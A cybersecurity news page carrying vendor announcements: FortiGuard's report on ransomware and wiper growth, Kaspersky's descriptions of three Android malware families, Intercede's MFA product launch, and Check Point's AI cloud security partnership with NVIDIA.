Connect with us
CCW 2024

Cyber Security

FortiGuard Labs Reports Ransomware Variants Almost Double in Six Months

Published

on

Fortinet has announced the latest semiannual FortiGuard Labs Global Threat Landscape Report. “Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” says Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”

Highlights of the 1H 2022 report follow:

  • The ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS).
  • Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence.
  • Destructive threat trends continue to evolve, as evidenced by the spread of wiper malware as part of adversary toolkits.
  • Cyber adversaries are embracing more reconnaissance and defense evasion techniques to increase precision and destructive weaponization across the cyber-attack chain.

Ransomware Variant Growth Shows Evolution of Crime Ecosystems: Ransomware remains a top threat and cyber adversaries continue to invest significant resources into new attack techniques. In the past six months, FortiGuard Labs has seen a total of 10,666 ransomware variants, compared to just 5,400 in the previous six-month period. That is nearly 100% growth in ransomware variants in half a year. RaaS, with its popularity on the dark web, continues to fuel an industry of criminals forcing organizations to consider ransomware settlements. To protect against ransomware, organizations, regardless of industry or size, need a proactive approach. Real-time visibility, protection, and remediation coupled with zero-trust network access (ZTNA) and advanced endpoint detection and response (EDR) are critical.

Exploit Trends Show OT and the Endpoint Are Still Irresistible Targets: The digital convergence of IT and OT and the endpoints enabling WFA remain key vectors of attack as adversaries continue to target the growing attack surface. Many exploits of vulnerabilities at the endpoint involve unauthorized users gaining access to a system with a goal of lateral movement to get deeper into corporate networks. For example, a spoofing vulnerability (CVE 2022-26925) placed high in volume, as well as a remote code execution (RCE) vulnerability (CVE 2022-26937). Also, analyzing endpoint vulnerabilities by volume and detections reveals the relentless path of cyber adversaries attempting to gain access by maximizing both old and new vulnerabilities. In addition, when looking specifically at OT vulnerability trends, the sector was not spared. A wide range of devices and platforms experienced in-the-wild exploits, demonstrating the cybersecurity reality of increased IT and OT convergence and the disruptive goals of adversaries. Advanced endpoint technology can help mitigate and effectively remediate infected devices at an early stage of an attack. In addition, services such as a digital risk protection service (DRPS) can be used to do external surface threat assessments, find and remediate security issues, and help gain contextual insights on current and imminent threats.

Destructive Threat Trends Continue With Wipers Widening: Wiper malware trends reveal a disturbing evolution of more destructive and sophisticated attack techniques continuing with malicious software that destroys data by wiping it clean. The war in Ukraine fueled a substantial increase in disk wiping malware among threat actors primarily targeting critical infrastructure. FortiGuard Labs identified at least seven major new wiper variants in the first six months of 2022 that were used in various campaigns against government, military, and private organizations. This number is significant because it is close to the number of wiper variants that have been publicly detected since 2012. Additionally, the wipers did not stay in one geographical location but were detected in 24 countries besides Ukraine. To minimize the impact of wiper attacks, network detection and response (NDR) with self-learning artificial intelligence (AI) is helpful to better detect intrusions. Also, backups must be stored offsite and offline.

Defense Evasion Remains Top Attack Tactic Globally: Examining adversarial strategies reveals takeaways about how attack techniques and tactics are evolving. FortiGuard Labs analyzed the functionality of detected malware to track the most prevalent approaches over the last six months. Among the top eight tactics and techniques focused on the endpoint, defense evasion was the most employed tactic by malware developers. They are often using system binary proxy execution to do so. Hiding malicious intentions is one of the most important things for adversaries. Therefore, they are attempting to evade defenses by masking them and attempting to hide commands using a legitimate certificate to execute a trusted process and carry out malicious intent. In addition, the second most popular technique was process injection, where criminals work to inject code into the address space of another process to evade defenses and improve stealth. Organizations will be better positioned to secure against the broad toolkits of adversaries armed with this actionable intelligence. Integrated, AI and ML-driven cybersecurity platforms with advanced detection and response capabilities powered by actionable threat intelligence are important to protect across all edges of hybrid networks.

AI-powered Security Across the Extended Attack Surface
When organizations gain a deeper understanding of the goals and tactics used by adversaries through actionable threat intelligence, they can better align defenses to adapt and react to quickly changing attack techniques proactively. Threat insights are critical to help prioritize patching strategies to better secure environments. Cybersecurity awareness and training are also important as the threat landscape changes to keep employees and security teams up-to-date. Organizations need security operations that can function at machine speed to keep up with the volume, sophistication, and rate of today’s cyber threats. AI and ML-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture allow for much tighter integration, increased automation, as well as a more rapid, coordinated, and effective response to threats across the extended network.

Report Overview
This latest Global Threat Landscape Report is a view representing the collective intelligence of FortiGuard Labs, drawn from Fortinet’s vast array of sensors collecting billions of threat events observed around the world during the first half of 2022. Similar to how the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access, the FortiGuard Labs Global Threat Landscape Report leverages this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets. The report also covers global and regional perspectives as well as threat trends affecting IT and OT.

Cyber Security

Kaspersky Warns of Android Malware Exhibiting Diverse Features

Published

on

Three new dangerous Android malware variants have been analyzed by Kaspersky researchers. The Tambir, Dwphon, and Gigabud malicious programs exhibit diverse features, ranging from downloading other programs and credential theft to bypassing two-factor authentication and screen recording, jeopardizing user privacy and security.

In 2023, Kaspersky Solutions blocked nearly 33.8 million attacks on mobile devices from malware, adware, and riskware, highlighting a 50% global increase in such attacks from the previous year’s figures. Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early 2021 levels by the end of the year. That said, the number of unique installation packages dropped from 2022, suggesting that malicious actors were more frequently using the same packages to infect different victims: last year Kaspersky detected more than 1.3 million unique malicious installation packages targeting the Android platform and distributed in various ways. Among these were Tambir, Dwphon and Gigabud malicious programs with the diverse features below described.

Tambir is a spyware application disguised as an IPTV app. It collects sensitive user information, such as SMS messages and keystrokes, after obtaining the appropriate permissions. The malware supports over 30 commands retrieved from its Command and Control server and has been compared to the GodFather malware, both targeting users mainly in Turkey, though several other countries were also affected.

Gigabud, active since mid-2022, was initially focused on stealing banking credentials from users in Southeast Asia, but later crossed borders into other countries and regions. It has since evolved into fake loan malware and is capable of screen recording and mimicking tapping by users to bypass two-factor authentication.

Dwphon, discovered in November 2023, targets cell phones from Chinese OEM manufacturers, primarily targeting the Russian market. The same malware earlier had been found in the firmware of a kids’ smartwatch by an Israeli manufacturer distributed mainly in Europe and the Middle East. Dwphon is distributed as a component of a system update application and collects information about the device as well as personal data. It also gathers information regarding installed third-party applications and is capable of downloading, installing and deleting other applications on the device. One of the analyzed samples also included the Triada trojan, one of the most widespread mobile trojans of 2023, which suggests that Dwphon modules are Triada-related.

“As Kaspersky’s mobile threats report shows, Android malware and riskware activity surged in 2023 after two years of relative calm, returning to levels seen in 2021 by the end of the year. Users should exercise caution and should avoid downloading apps from unofficial sources, meticulously reviewing app permissions. Frequently, these apps lack exploitation functionality and depend solely on permissions granted by the user. Furthermore, using anti-malware tools can help preserve the integrity of your Android device,” comments Jornt van der Wiel, senior security researcher at Kaspersky’s GReAT.

Continue Reading

Cyber Security

Intercede Intros MyID MFA v5

Published

on

Intercede has announced the launch of MyID MFA (Multi-Factor Authentication) 5.0. The latest addition to the MyID product family raises the security bar, by enabling organizations to protect on-premise and cloud-based applications, as well as the Windows desktop logon (on and off-line) with a range of phishing-resistant MFA options including OTP (one-time passwords), mobile apps, syncable FIDO passkeys and biometric protected hardware devices.

Bringing enterprise-managed FIDO passkeys into MyID MFA makes it easy to FIDO-enable multiple applications and deploy passkeys to end users, enhancing security and improving the user experience. MyID MFA acts as both a FIDO authentication server and a passkey issuance solution. End users authenticate to MyID MFA with their passkey, and by support for standard federated identity protocols, MyID MFA provides authentication services to multiple applications including cloud, on-premise and Windows desktop logon.

Organizations can choose from syncable passkeys, that use the FIDO protocol built into mobile devices and web browsers, to deliver a simple, secure and passwordless authentication process, via fingerprint, face ID or PIN. For organizations requiring higher levels of security and control, MyID MFA supports device-bound passkeys, such as Yubikey and the innovative YubiKey Bio device, which delivers a similarly seamless authentication experience while ensuring the highest level of security.

MyID MFA also enables the federation of applications (the ability to share identity and authentication information between systems in a managed way), be they cloud-based or on-premise, with support for standards-based protocols such as OpenID Connect and SAML. With federated identity provider (IDP) capabilities built into MyID MFA, it is a natural successor to Microsoft ADFS (Active Directory Federation Services). In addition to acting as an IDP, MyID MFA enables federations with an organisation’s existing credentials and identity providers, including Google and Microsoft Authenticator apps. This allows users to use the apps they are already familiar with and enables organisations to use credentials that are already deployed, reducing operational costs and speeding up the time to deployment.

MyID MFA supports the delivery of a unified authentication experience across the entire application suite, including authentication to applications, accessing self-service portals (to reset credentials), as well as logging on to the Windows desktop. The Windows Desktop Agent has been enhanced in v5.0 with added support for federation, the inclusion of third-party authenticators and FIDO passkeys, meaning organizations have a wider choice than ever on how to protect the primary gateway to their data, networks and applications, regardless of whether they are on Windows 11 or Windows 10 devices.

Allen Storey, Chief Product Officer at Intercede, states: “It is our mission to help organizations protect themselves against data breach by deploying stronger authentication simply, securely and at scale, whether they are SMBs with hundreds of users, larger enterprises, or federal authorities with thousands of users. MyID MFA is the simplest way for any organization to protect their applications, data and networks against cyber-attacks, with phishing-resistant authentication that is easy to deploy, manage and use.”

MyID MFA is part of the MyID product family that includes MyID PSM (Password Security Management) and MyID CMS (Credential Management System), which enables organisations to choose the level of security that best fits their needs, from passwords to one-time codes, mobile apps, FIDO passkeys and public key infrastructure (PKI).

Continue Reading

Artificial Intelligence

Check Point to Secure AI Cloud Infrastructure with NVIDIA

Published

on

Check Point Software Technologies has announced it is collaborating with NVIDIA to enhance the security of AI cloud infrastructure. Integrating with NVIDIA DPUs, the new Check Point AI Cloud Protect solution will help prevent threats at both the network and host levels.

“AI provides great benefits across healthcare, education, finance and more. At the same time, the rate and sophistication of cyber attacks are increasing, with threat actors increasingly looking at ways to disrupt AI workloads in the cloud,” said Gera Dorfman, Vice President of Network Security at Check Point Software Technologies. “We are working with NVIDIA to deliver a new secure AI cloud solution with Check Point AI Cloud Protect that guards even the most sensitive and private AI workloads against cyber threats.”

The rapid proliferation of AI has brought about a revolution in workplace efficiency and innovation. However, this growth also creates additional attack vectors specifically targeting AI, such as backdooring AI models to control a model’s output or to gain unauthorized access to the environment, data exfiltration to expose intellectual property, and denial of service to degrade performance and reduce capacity.

These threats compromise the integrity and security of AI systems and pose risks to business outcomes. They can also erode the foundational trust in AI operations, while potentially affecting other aspects of the data center. There is a critical need for a revamped security approach to protect not only the data in its traditional form but also the AI models themselves, which are central to innovation and competitive edge.

Check Point aims to address these challenges with NVIDIA by integrating network and host-level security insights, offering a comprehensive solution that protects AI infrastructures from both conventional and novel cyber threats. This integrated approach helps ensure the security system is cognizant of network activities and host-level processes, which is crucial for safeguarding AI’s future.

As AI becomes more pervasive, securing AI clouds becomes paramount,” said Yael Shenhav, Vice President of Networking Products at NVIDIA. “NVIDIA BlueField 3 enables innovators such as Check Point to offer robust cyber defence measures to secure AI cloud data centres, while also ensuring peak AI performance.”

In response to these emerging challenges, AI Cloud Protect emerges as a strategic solution, addressing the dynamic security requirements of the AI era. Designed for easy deployment and adaptability, it offers out-of-the-box security without impacting AI performance. Designed for effortless integration and scalability, the AI Cloud Protect provides a robust shield against sophisticated cyber threats.

Engineered with the NVIDIA BlueField 3 DPU, which powers a new class of AI cloud data centres, and the NVIDIA DOCA software framework, AI Cloud Protect is designed to seamlessly integrate into NVIDIA’s AI ecosystems, providing:

  • Robust Defense Against AI-Specific Threats: Empowers organizations to efficiently shield against model inversion, model theft and other attack vectors with unprecedented efficiency.
  • Scalable, Seamless Integration: Facilitates easy deployment across diverse AI environments, ensuring security measures grow in tandem with organizational needs.
  • Optimized Performance with Zero Compromise: Ensures AI operations continue unhindered, with security processes running discreetly, leveraging NVIDIA’s technological infrastructure without impacting AI performance.
Continue Reading
Advertisement CCW 2024

Follow Us

Trending

Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.